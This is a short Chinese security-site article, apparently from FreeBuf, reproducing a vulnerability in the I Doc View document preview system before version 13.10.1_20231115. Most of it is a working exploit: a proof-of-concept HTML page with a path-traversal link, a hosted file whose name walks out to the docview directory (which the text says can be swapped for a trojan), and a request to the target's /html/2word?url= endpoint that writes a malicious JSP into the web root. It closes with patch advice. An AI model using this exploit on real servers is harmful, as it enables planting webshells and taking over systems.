官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
I Doc View在线文档预览系统
受影响版本
I Doc View < 13.10.1_20231115
1.本地服务器上新建一个html文件,文件内容如下:
<!DOCTYPE html>
<html lang="en">
<head>
<title>test</title>
</head>
<body>
<link href="/..\..\..\docview\testpoc.jsp">
</body>
</html>
2.本地服务器上新建一个..\..\..\docview\testpoc.jsp(可以换成木马什么的),内容如下:
test
3.上面这个文件可以这么来创建
4.创建好的文件如下:
5.之后可以在上面目录下用python启动一个http服务,接着直接访问漏洞地址http://目标地址/html/2word?url=http://本地服务器地址/tt.html触发该漏洞。
6.漏洞触发后,会在网站根目录下创建恶意jsp文件,如下图:
目前I Doc View官方已发布新版本修复该漏洞,建议受影响的用户尽快至官网下载更新或联系技术支持获取安全补丁修复漏洞。